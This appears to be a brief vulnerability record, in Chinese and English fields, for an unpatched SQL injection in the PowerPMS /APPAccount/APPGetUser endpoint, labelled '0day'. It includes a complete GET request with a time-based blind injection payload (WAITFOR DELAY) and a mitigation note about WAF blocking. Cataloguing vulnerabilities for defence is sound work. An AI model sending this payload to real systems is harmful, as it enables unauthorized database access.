vendor = "PowerPMS"
name = "PowerPMS APPGetUser 接口 SQL 注入漏洞"
type = "SQL注入"
version = "未知"
path = "/APPAccount/APPGetUser"
detail = "GET /APPAccount/APPGetUser?name=1%27%29%3BWAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1"
fix = "WAF封禁路路径，等待发布补丁"
date = "0807"
label = "0day"
